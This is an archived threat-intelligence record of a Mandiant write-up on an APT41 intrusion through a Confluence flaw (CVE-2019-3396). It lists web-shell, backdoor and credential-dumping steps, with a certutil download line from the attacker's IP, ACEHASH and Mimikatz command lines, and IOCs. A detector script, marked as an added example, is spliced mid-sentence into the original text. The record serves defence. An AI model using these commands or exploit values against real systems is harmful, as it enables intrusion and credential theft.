{
	"id": "46d2efbe-5e7e-41a7-b269-da217f9b588e",
	"created_at": "2026-04-06T00:16:46.797014Z",
	"updated_at": "2026-04-10T03:32:20.68838Z",
	"deleted_at": null,
	"sha1_hash": "002d8d0f84568a958a0c0073b9daca8bad4b23d4",
	"title": "GAME OVER: Detecting and Stopping an APT41 Operation | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 747932,
	"plain_text": "GAME OVER: Detecting and Stopping an APT41 Operation |\r\nMandiant\r\nBy Mandiant\r\nPublished: 2019-08-19 · Archived: 2026-04-05 17:21:08 UTC\r\nWritten by: Alex Pennino, Matt Bromiley\r\nIn August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A\r\nChina-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare,\r\nhigh-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes\r\nand detections within victim environments, often recompiling malware within hours of incident responder activity.\r\nIn multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and\r\nexploiting them within a matter of days.\r\nOur knowledge of this group’s targets and activities is rooted in our Incident Response and Managed Defense\r\nservices, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse\r\nmalware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed\r\nDefense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.\r\nIn this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with\r\nAPT41. Our goal is to show not only how dynamic this group can be, but also how the various teams within\r\nFireEye worked to thwart attacks within hours of detection – protecting our clients’ networks, limiting the\r\nthreat actor’s ability to gain a foothold and preventing data exposure.\r\nGET TO DA CHOPPA!\r\nIn April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server\r\nat a U.S.-based research university. 
This activity, a snippet of which is provided in Figure 1, indicated that the\r\nattackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path\r\ntraversal and remote code execution.\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 1 of 7\n\nFigure 1: Snippet of PCAP showing the attacker attempting to exploit CVE-2019-3396\r\nThis vulnerability relies on the following actions by the attacker:\r\nCustomizing the _template field to utilize a template that allowed for command execution.\r\nInserting a cmd field that provided the command to be executed.\r\nThrough custom JSON POST requests, the attackers were able to run commands and force the vulnerable system\r\nto download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.\r\nFigure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396\r\nAs shown in Figure 2, the attacker utilized a template located at\r\nhxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue\r\narbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.\r\nFigure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system\r\nThe HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system\r\nreconnaissance and utilized Windows certutil.exe to download a file located at\r\nhxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). 
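The following Python detector is an added example, not code from the original Mandiant post. It turns the two observations above into checks that run over constructed sample data: a Confluence JSON POST whose _template field points outside the local install (a remote URL or a traversal path), with any cmd field recorded alongside it, and a certutil.exe command line that fetches a URL. The sample bodies, the macro/params wrapping around the fields, the certutil switches and all helper names are assumptions; the page itself only names the _template and cmd fields, the cmd.vm template URL and the certutil download of pass_sqzr.jsp as test.jsp.

```python
import json
from typing import Any, Dict, Iterator, List, Optional, Tuple

# Template references that leave the local Confluence install by URL scheme.
REMOTE_PREFIXES = ('http://', 'https://', 'ftp://', 'file://')

# Constructed sample POST bodies (source IP, raw body). They are modelled on the
# _template and cmd fields the write-up names, not copied from the original PCAP;
# the surrounding macro/params wrapping is an assumption.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ('10.0.0.5', json.dumps({'macro': {'name': 'widget',
                             'params': {'url': 'https://example.org/v/1'}}})),
    ('67.229.97.229', json.dumps({'macro': {'name': 'widget', 'params': {
        '_template': 'https://github.com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm',
        'cmd': 'whoami'}}})),
    ('67.229.97.229', json.dumps({'macro': {'name': 'widget', 'params': {
        '_template': '../../../../templates/local.vm'}}})),
    ('10.0.0.7', 'not a json body'),
]

# Constructed process command lines. The certutil switches are an assumption;
# the write-up only states that certutil.exe fetched pass_sqzr.jsp as test.jsp.
SAMPLE_PROCESS_EVENTS: List[str] = [
    'certutil.exe -urlcache -split -f http://67.229.97.229/pass_sqzr.jsp test.jsp',
    'certutil.exe -verify server.cer',
    'powershell.exe -nop -c Get-Process',
]


def walk(node: Any) -> Iterator[Tuple[str, Any]]:
    # Yield every (key, value) pair at any depth so the check does not depend
    # on the exact nesting a particular exploit script uses.
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from walk(item)


def template_is_remote(template: str) -> bool:
    # A remote URL or a directory-traversal path is what lets an attacker
    # supply a template of their own choosing through CVE-2019-3396.
    lowered = template.strip().lower()
    return lowered.startswith(REMOTE_PREFIXES) or '../' in lowered or '..%2f' in lowered


def check_confluence_post(source_ip: str, body: str) -> Optional[Dict[str, Any]]:
    # Alert when a JSON POST body carries a remote _template; record any cmd
    # field alongside it, since that is the command the template will run.
    try:
        doc = json.loads(body)
    except ValueError:
        return None  # not JSON, so not this exploit
    template = None
    cmd = None
    for key, value in walk(doc):
        if key == '_template' and isinstance(value, str):
            template = value
        elif key == 'cmd' and isinstance(value, str):
            cmd = value
    if template is None or not template_is_remote(template):
        return None
    return {'rule': 'CVE-2019-3396 remote template', 'src': source_ip,
            'template': template, 'cmd': cmd}


def check_certutil_download(command_line: str) -> Optional[Dict[str, Any]]:
    # certutil with -urlcache and an http(s) URL is the living-off-the-land
    # download that placed the China Chopper web shell on the server.
    lowered = command_line.lower()
    if 'certutil' not in lowered or 'urlcache' not in lowered:
        return None
    urls = [tok for tok in command_line.split()
            if tok.lower().startswith(('http://', 'https://'))]
    if not urls:
        return None
    return {'rule': 'certutil downloader', 'url': urls[0],
            'command_line': command_line}


def run() -> List[Dict[str, Any]]:
    # Apply both checks to the constructed samples and collect the alerts.
    alerts: List[Dict[str, Any]] = []
    for src, body in SAMPLE_REQUESTS:
        hit = check_confluence_post(src, body)
        if hit is not None:
            alerts.append(hit)
    for cmdline in SAMPLE_PROCESS_EVENTS:
        hit = check_certutil_download(cmdline)
        if hit is not None:
            alerts.append(hit)
    return alerts


if __name__ == '__main__':
    for alert in run():
        print(alert)
```

Each alert keeps the source IP and the template or download URL so an analyst can pivot on the host the content was fetched from; in this incident the same address served the exploit template target, the web shell and the follow-on payloads. The traversal check is deliberately loose (any ../ or its URL-encoded form) because a local-path abuse of the same field does not need a remote host at all.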
The\r\nfile test.jsp was ultimately identified to be a variant of a China Chopper webshell.\r\nA Passive Aggressive Operation\r\nShortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the\r\nsystem:\r\n64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)\r\nIns64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)\r\nBoth files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was\r\nused to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple\r\ncomponents, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy\r\none of two embedded drivers to conceal network traffic and communicate with its command and control server to\r\ndownload and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as\r\nHIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON\r\nmalware family can be found in our full APT41 report).\r\nWithin the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to\r\nissue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web\r\nshell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:\r\nMovement of 64.dat and Ins64.exe to C:\\Program Files\\Atlassian\\Confluence\r\nPerforming a directory listing of C:\\Program Files\\Atlassian\\Confluence\r\nPerforming a directory listing of C:\\Users\r\nAdditionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON\r\nbackdoor, allowing us to decode the attacker’s traffic. 
Figure 4 provides a list of the various commands issued by\r\nthe attacker utilizing HIGHNOON.\r\nFigure 4: Decoded HIGHNOON commands issued by the attacker\r\nPlaying Their ACEHASH Card\r\nAs shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that\r\ndownloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of\r\nthis blog post, the script was no longer available for downloading. The commands provided to the script –\r\n“privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of\r\nInvoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this\r\ncommand failed.\r\nAfter performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional\r\nfiles into the C:\\Program Files\\Atlassian\\Confluence directory:\r\nc64.exe (MD5: 846cdb921841ac671c86350d494abf9c)\r\nF64.data (MD5: a919b4454679ef60b39c82bd686ed141)\r\nThese two files are the dropper and encrypted/compressed payload components, respectively, of a malware family\r\nknown as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the\r\nfunctionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).\r\nUpon placing c64.exe and F64.data on the system, the attacker ran the command\r\nc64.exe f64.data \"9839D7F1A0 -m\"\r\nThis specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch\r\nof “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. 
With the correct password\r\nprovided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.\r\nUltimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware onto the\r\nvulnerable Confluence system. While the Mimikatz attempt failed, via ACEHASH the attacker was able to harvest a single\r\ncredential from the system. However, as Managed Defense detected this activity rapidly via network signatures,\r\nthis operation was neutralized before the attackers progressed any further.\r\nKey Takeaways From This Incident\r\nAPT41 utilized multiple malware families to maintain access into this environment; impactful remediation\r\nrequires full scoping of an incident.\r\nFor effective Managed Detection \u0026 Response services, having coverage of both Endpoint and Network is\r\ncritical for detecting and responding to targeted attacks.\r\nAttackers may weaponize vulnerabilities quickly after their release, especially if they are present within a\r\ntargeted environment. 
Patching of critical vulnerabilities ASAP is crucial to deter active attackers.\r\nDetecting the Techniques\r\nFireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China\r\nChopper.\r\nDetection            Signature Name\r\nChina Chopper        FE_Webshell_JSP_CHOPPER_1\r\n                     FE_Webshell_Java_CHOPPER_1\r\n                     FE_Webshell_MSIL_CHOPPER_1\r\nHIGHNOON.PASSIVE     FE_APT_Backdoor_Raw64_HIGHNOON_2\r\n                     FE_APT_Backdoor_Win64_HIGHNOON_2\r\nCertutil Downloader  CERTUTIL.EXE DOWNLOADER (UTILITY)\r\n                     CERTUTIL.EXE DOWNLOADER A (UTILITY)\r\nACEHASH              FE_Trojan_AceHash\r\nIndicators\r\nType        Indicator        MD5 Hash (if applicable)\r\nFile        test.jsp         84d6e4ba1f4268e50810dacc7bbc3935\r\nFile        64.dat           51e06382a88eb09639e1bc3565b444a6\r\nFile        Ins64.exe        e42555b218248d1a2ba92c1532ef6786\r\nFile        c64.exe          846cdb921841ac671c86350d494abf9c\r\nFile        F64.data         a919b4454679ef60b39c82bd686ed141\r\nIP Address  67.229.97[.]229  N/A\r\nLooking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. Here's a\r\ndirect link to the public APT41 report.\r\nAcknowledgements\r\nSpecial thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for\r\nidentification and reversing of the HIGHNOON.PASSIVE malware.\r\nSource: https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html"
	],
	"report_names": [
		"game-over-detecting-and-stopping-an-apt41-operation.html"
	],
	"threat_actors": [
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434606,
	"ts_updated_at": 1775791940,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.pdf",
		"text": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.txt",
		"img": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.jpg"
	}
}